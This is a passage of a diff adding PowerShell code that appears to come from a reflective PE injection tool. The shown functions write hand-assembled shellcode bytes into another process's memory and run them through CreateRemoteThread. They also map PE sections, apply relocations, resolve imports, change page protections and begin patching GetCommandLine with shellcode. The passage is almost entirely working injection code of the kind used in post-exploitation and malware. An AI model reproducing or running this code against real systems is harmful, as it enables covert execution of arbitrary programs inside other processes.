+ $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress") #Kernel32 loaded to the same address for all processes
1508
+
1509
+
1510
+ #Allocate memory for the address returned by GetProcAddress
1511
+ $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
1512
+ if ($GetProcAddressRetMem -eq [IntPtr]::Zero)
1513
+ {
1514
+ Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress"
1515
+ }
1516
+
1517
+
1518
+ #Write Shellcode to the remote process which will call GetProcAddress
1519
+ #Shellcode: GetProcAddress.asm
1520
+ [Byte[]]$GetProcAddressSC = @()
1521
+ if ($PEInfo.PE64Bit -eq $true)
1522
+ {
1523
+ $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
1524
+ $GetProcAddressSC2 = @(0x48, 0xba)
1525
+ $GetProcAddressSC3 = @(0x48, 0xb8)
1526
+ $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)
1527
+ $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
1528
+ }
1529
+ else
1530
+ {
1531
+ $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)
1532
+ $GetProcAddressSC2 = @(0xb9)
1533
+ $GetProcAddressSC3 = @(0x51, 0x50, 0xb8)
1534
+ $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)
1535
+ $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)
1536
+ }
1537
+ $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)
1538
+ $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
1539
+ $SCPSMemOriginal = $SCPSMem
1540
+
1541
+ Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem
1542
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)
1543
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)
1544
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1545
+ Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem
1546
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)
1547
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)
1548
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1549
+ Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem
1550
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)
1551
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)
1552
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1553
+ Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem
1554
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)
1555
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)
1556
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1557
+ Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem
1558
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)
1559
+
1560
+ $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
1561
+ if ($RSCAddr -eq [IntPtr]::Zero)
1562
+ {
1563
+ Throw "Unable to allocate memory in the remote process for shellcode"
1564
+ }
1565
+ [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
1566
+ $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
1567
+ if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
1568
+ {
1569
+ Throw "Unable to write shellcode to remote process memory."
1570
+ }
1571
+
1572
+ $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
1573
+ $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
1574
+ if ($Result -ne 0)
1575
+ {
1576
+ Throw "Call to CreateRemoteThread to call GetProcAddress failed."
1577
+ }
1578
+
1579
+ #The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory
1580
+ [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
1581
+ $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
1582
+ if (($Result -eq $false) -or ($NumBytesWritten -eq 0))
1583
+ {
1584
+ Throw "Call to ReadProcessMemory failed"
1585
+ }
1586
+ [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
1587
+
1588
+ #Cleanup remote process memory
1589
+ $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1590
+ $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1591
+
1592
+ if (-not $LoadByOrdinal)
1593
+ {
1594
+ $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1595
+ }
1596
+
1597
+ return $ProcAddress
1598
+ }
1599
+
1600
+
1601
+ Function Copy-Sections
1602
+ {
1603
+ Param(
1604
+ [Parameter(Position = 0, Mandatory = $true)]
1605
+ [Byte[]]
1606
+ $PEBytes,
1607
+
1608
+ [Parameter(Position = 1, Mandatory = $true)]
1609
+ [System.Object]
1610
+ $PEInfo,
1611
+
1612
+ [Parameter(Position = 2, Mandatory = $true)]
1613
+ [System.Object]
1614
+ $Win32Functions,
1615
+
1616
+ [Parameter(Position = 3, Mandatory = $true)]
1617
+ [System.Object]
1618
+ $Win32Types
1619
+ )
1620
+
1621
+ for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
1622
+ {
1623
+ [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
1624
+ $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
1625
+
1626
+ #Address to copy the section to
1627
+ [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))
1628
+
1629
+ #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated
1630
+ # in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If
1631
+ # SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away,
1632
+ # so truncate SizeOfRawData to VirtualSize
1633
+ $SizeOfRawData = $SectionHeader.SizeOfRawData
1634
+
1635
+ if ($SectionHeader.PointerToRawData -eq 0)
1636
+ {
1637
+ $SizeOfRawData = 0
1638
+ }
1639
+
1640
+ if ($SizeOfRawData -gt $SectionHeader.VirtualSize)
1641
+ {
1642
+ $SizeOfRawData = $SectionHeader.VirtualSize
1643
+ }
1644
+
1645
+ if ($SizeOfRawData -gt 0)
1646
+ {
1647
+ Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null
1648
+ [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)
1649
+ }
1650
+
1651
+ #If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space
1652
+ if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)
1653
+ {
1654
+ $Difference = $SectionHeader.VirtualSize - $SizeOfRawData
1655
+ [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))
1656
+ Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null
1657
+ $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null
1658
+ }
1659
+ }
1660
+ }
1661
+
1662
+
1663
+ Function Update-MemoryAddresses
1664
+ {
1665
+ Param(
1666
+ [Parameter(Position = 0, Mandatory = $true)]
1667
+ [System.Object]
1668
+ $PEInfo,
1669
+
1670
+ [Parameter(Position = 1, Mandatory = $true)]
1671
+ [Int64]
1672
+ $OriginalImageBase,
1673
+
1674
+ [Parameter(Position = 2, Mandatory = $true)]
1675
+ [System.Object]
1676
+ $Win32Constants,
1677
+
1678
+ [Parameter(Position = 3, Mandatory = $true)]
1679
+ [System.Object]
1680
+ $Win32Types
1681
+ )
1682
+
1683
+ [Int64]$BaseDifference = 0
1684
+ $AddDifference = $true #Track if the difference variable should be added or subtracted from variables
1685
+ [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)
1686
+
1687
+ #If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do
1688
+ if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `
1689
+ -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))
1690
+ {
1691
+ return
1692
+ }
1693
+
1694
+
1695
+ elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)
1696
+ {
1697
+ $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)
1698
+ $AddDifference = $false
1699
+ }
1700
+ elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)
1701
+ {
1702
+ $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)
1703
+ }
1704
+
1705
+ #Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified
1706
+ [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))
1707
+ while($true)
1708
+ {
1709
+ #If SizeOfBlock == 0, we are done
1710
+ $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)
1711
+
1712
+ if ($BaseRelocationTable.SizeOfBlock -eq 0)
1713
+ {
1714
+ break
1715
+ }
1716
+
1717
+ [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))
1718
+ $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2
1719
+
1720
+ #Loop through each relocation
1721
+ for($i = 0; $i -lt $NumRelocations; $i++)
1722
+ {
1723
+ #Get info for this relocation
1724
+ $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))
1725
+ [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])
1726
+
1727
+ #First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase
1728
+ [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF
1729
+ [UInt16]$RelocType = $RelocationInfo -band 0xF000
1730
+ for ($j = 0; $j -lt 12; $j++)
1731
+ {
1732
+ $RelocType = [Math]::Floor($RelocType / 2)
1733
+ }
1734
+
1735
+ #For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit.
1736
+ #This appears to be true for EXE's as well.
1737
+ # Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx
1738
+ if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `
1739
+ -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))
1740
+ {
1741
+ #Get the current memory address and update it based off the difference between PE expected base address and actual base address
1742
+ [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))
1743
+ [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])
1744
+
1745
+ if ($AddDifference -eq $true)
1746
+ {
1747
+ [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
1748
+ }
1749
+ else
1750
+ {
1751
+ [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
1752
+ }
1753
+
1754
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
1755
+ }
1756
+ elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)
1757
+ {
1758
+ #IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it
1759
+ Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo"
1760
+ }
1761
+ }
1762
+
1763
+ $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))
1764
+ }
1765
+ }
1766
+
1767
+
1768
+ Function Import-DllImports
1769
+ {
1770
+ Param(
1771
+ [Parameter(Position = 0, Mandatory = $true)]
1772
+ [System.Object]
1773
+ $PEInfo,
1774
+
1775
+ [Parameter(Position = 1, Mandatory = $true)]
1776
+ [System.Object]
1777
+ $Win32Functions,
1778
+
1779
+ [Parameter(Position = 2, Mandatory = $true)]
1780
+ [System.Object]
1781
+ $Win32Types,
1782
+
1783
+ [Parameter(Position = 3, Mandatory = $true)]
1784
+ [System.Object]
1785
+ $Win32Constants,
1786
+
1787
+ [Parameter(Position = 4, Mandatory = $false)]
1788
+ [IntPtr]
1789
+ $RemoteProcHandle
1790
+ )
1791
+
1792
+ $RemoteLoading = $false
1793
+ if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)
1794
+ {
1795
+ $RemoteLoading = $true
1796
+ }
1797
+
1798
+ if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
1799
+ {
1800
+ [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
1801
+
1802
+ while ($true)
1803
+ {
1804
+ $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
1805
+
1806
+ #If the structure is null, it signals that this is the end of the array
1807
+ if ($ImportDescriptor.Characteristics -eq 0 `
1808
+ -and $ImportDescriptor.FirstThunk -eq 0 `
1809
+ -and $ImportDescriptor.ForwarderChain -eq 0 `
1810
+ -and $ImportDescriptor.Name -eq 0 `
1811
+ -and $ImportDescriptor.TimeDateStamp -eq 0)
1812
+ {
1813
+ Write-Verbose "Done importing DLL imports"
1814
+ break
1815
+ }
1816
+
1817
+ $ImportDllHandle = [IntPtr]::Zero
1818
+ $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))
1819
+ $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
1820
+
1821
+ if ($RemoteLoading -eq $true)
1822
+ {
1823
+ $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr
1824
+ }
1825
+ else
1826
+ {
1827
+ $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)
1828
+ }
1829
+
1830
+ if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))
1831
+ {
1832
+ throw "Error importing DLL, DLLName: $ImportDllPath"
1833
+ }
1834
+
1835
+ #Get the first thunk, then loop through all of them
1836
+ [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)
1837
+ [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk
1838
+ [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
1839
+
1840
+ while ($OriginalThunkRefVal -ne [IntPtr]::Zero)
1841
+ {
1842
+ $LoadByOrdinal = $false
1843
+ [IntPtr]$ProcedureNamePtr = [IntPtr]::Zero
1844
+ #Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit
1845
+ # If the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint
1846
+ # and doing the comparison, just see if it is less than 0
1847
+ [IntPtr]$NewThunkRef = [IntPtr]::Zero
1848
+ if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]$OriginalThunkRefVal -lt 0)
1849
+ {
1850
+ [IntPtr]$ProcedureNamePtr = [IntPtr]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal
1851
+ $LoadByOrdinal = $true
1852
+ }
1853
+ elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]$OriginalThunkRefVal -lt 0)
1854
+ {
1855
+ [IntPtr]$ProcedureNamePtr = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal
1856
+ $LoadByOrdinal = $true
1857
+ }
1858
+ else
1859
+ {
1860
+ [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)
1861
+ $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))
1862
+ $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)
1863
+ $ProcedureNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ProcedureName)
1864
+ }
1865
+
1866
+ if ($RemoteLoading -eq $true)
1867
+ {
1868
+ [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionNamePtr $ProcedureNamePtr -LoadByOrdinal $LoadByOrdinal
1869
+ }
1870
+ else
1871
+ {
1872
+ [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressIntPtr.Invoke($ImportDllHandle, $ProcedureNamePtr)
1873
+ }
1874
+
1875
+ if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)
1876
+ {
1877
+ if ($LoadByOrdinal)
1878
+ {
1879
+ Throw "New function reference is null, this is almost certainly a bug in this script. Function Ordinal: $ProcedureNamePtr. Dll: $ImportDllPath"
1880
+ }
1881
+ else
1882
+ {
1883
+ Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath"
1884
+ }
1885
+ }
1886
+
1887
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)
1888
+
1889
+ $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
1890
+ [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
1891
+ [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
1892
+
1893
+ #Cleanup
1894
+ #If loading by ordinal, ProcedureNamePtr is the ordinal value and not actually a pointer to a buffer that needs to be freed
1895
+ if ((-not $LoadByOrdinal) -and ($ProcedureNamePtr -ne [IntPtr]::Zero))
1896
+ {
1897
+ [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcedureNamePtr)
1898
+ $ProcedureNamePtr = [IntPtr]::Zero
1899
+ }
1900
+ }
1901
+
1902
+ $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
1903
+ }
1904
+ }
1905
+ }
1906
+
1907
+ Function Get-VirtualProtectValue
1908
+ {
1909
+ Param(
1910
+ [Parameter(Position = 0, Mandatory = $true)]
1911
+ [UInt32]
1912
+ $SectionCharacteristics
1913
+ )
1914
+
1915
+ $ProtectionFlag = 0x0
1916
+ if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)
1917
+ {
1918
+ if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
1919
+ {
1920
+ if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
1921
+ {
1922
+ $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE
1923
+ }
1924
+ else
1925
+ {
1926
+ $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ
1927
+ }
1928
+ }
1929
+ else
1930
+ {
1931
+ if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
1932
+ {
1933
+ $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY
1934
+ }
1935
+ else
1936
+ {
1937
+ $ProtectionFlag = $Win32Constants.PAGE_EXECUTE
1938
+ }
1939
+ }
1940
+ }
1941
+ else
1942
+ {
1943
+ if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
1944
+ {
1945
+ if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
1946
+ {
1947
+ $ProtectionFlag = $Win32Constants.PAGE_READWRITE
1948
+ }
1949
+ else
1950
+ {
1951
+ $ProtectionFlag = $Win32Constants.PAGE_READONLY
1952
+ }
1953
+ }
1954
+ else
1955
+ {
1956
+ if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
1957
+ {
1958
+ $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY
1959
+ }
1960
+ else
1961
+ {
1962
+ $ProtectionFlag = $Win32Constants.PAGE_NOACCESS
1963
+ }
1964
+ }
1965
+ }
1966
+
1967
+ if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)
1968
+ {
1969
+ $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE
1970
+ }
1971
+
1972
+ return $ProtectionFlag
1973
+ }
1974
+
1975
+ Function Update-MemoryProtectionFlags
1976
+ {
1977
+ Param(
1978
+ [Parameter(Position = 0, Mandatory = $true)]
1979
+ [System.Object]
1980
+ $PEInfo,
1981
+
1982
+ [Parameter(Position = 1, Mandatory = $true)]
1983
+ [System.Object]
1984
+ $Win32Functions,
1985
+
1986
+ [Parameter(Position = 2, Mandatory = $true)]
1987
+ [System.Object]
1988
+ $Win32Constants,
1989
+
1990
+ [Parameter(Position = 3, Mandatory = $true)]
1991
+ [System.Object]
1992
+ $Win32Types
1993
+ )
1994
+
1995
+ for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
1996
+ {
1997
+ [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
1998
+ $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
1999
+ [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)
2000
+
2001
+ [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics
2002
+ [UInt32]$SectionSize = $SectionHeader.VirtualSize
2003
+
2004
+ [UInt32]$OldProtectFlag = 0
2005
+ Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null
2006
+ $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)
2007
+ if ($Success -eq $false)
2008
+ {
2009
+ Throw "Unable to change memory protection"
2010
+ }
2011
+ }
2012
+ }
2013
+
2014
+ #This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE
2015
+ #Returns an object with addresses to copies of the bytes that were overwritten (and the count)
2016
+ Function Update-ExeFunctions
2017
+ {
2018
+ Param(
2019
+ [Parameter(Position = 0, Mandatory = $true)]
2020
+ [System.Object]
2021
+ $PEInfo,
2022
+
2023
+ [Parameter(Position = 1, Mandatory = $true)]
2024
+ [System.Object]
2025
+ $Win32Functions,
2026
+
2027
+ [Parameter(Position = 2, Mandatory = $true)]
2028
+ [System.Object]
2029
+ $Win32Constants,
2030
+
2031
+ [Parameter(Position = 3, Mandatory = $true)]
2032
+ [String]
2033
+ $ExeArguments,
2034
+
2035
+ [Parameter(Position = 4, Mandatory = $true)]
2036
+ [IntPtr]
2037
+ $ExeDoneBytePtr
2038
+ )
2039
+
2040
+ #This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state.
2041
+ $ReturnArray = @()
2042
+
2043
+ $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
2044
+ [UInt32]$OldProtectFlag = 0
2045
+
2046
+ [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll")
2047
+ if ($Kernel32Handle -eq [IntPtr]::Zero)
2048
+ {
2049
+ throw "Kernel32 handle null"
2050
+ }
2051
+
2052
+ [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll")
2053
+ if ($KernelBaseHandle -eq [IntPtr]::Zero)
2054
+ {
2055
+ throw "KernelBase handle null"
2056
+ }
2057
+
2058
+ #################################################
2059
+ #First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it.
2060
+ # We overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want.
2061
+ $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
2062
+ $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
2063
+
2064
+ [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA")
2065
+ [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW")
2066
+
2067
+ if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
2068
+ {
2069
+ throw "GetCommandLine ptr null. GetCommandLineA: $(Get-Hex $GetCommandLineAAddr). GetCommandLineW: $(Get-Hex $GetCommandLineWAddr)"
2070
+ }
2071
+
2072
+ #Prepare the shellcode
2073
+ [Byte[]]$Shellcode1 = @()
2074
+ if ($PtrSize -eq 8)
2075
+ {
2076
+ $Shellcode1 += 0x48 #64bit shellcode has the 0x48 before the 0xb8
2077
+ }
2078
+ $Shellcode1 += 0xb8
2079
+
2080
+ [Byte[]]$Shellcode2 = @(0xc3)
2081
+ $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length
2082
+
2083
+
2084
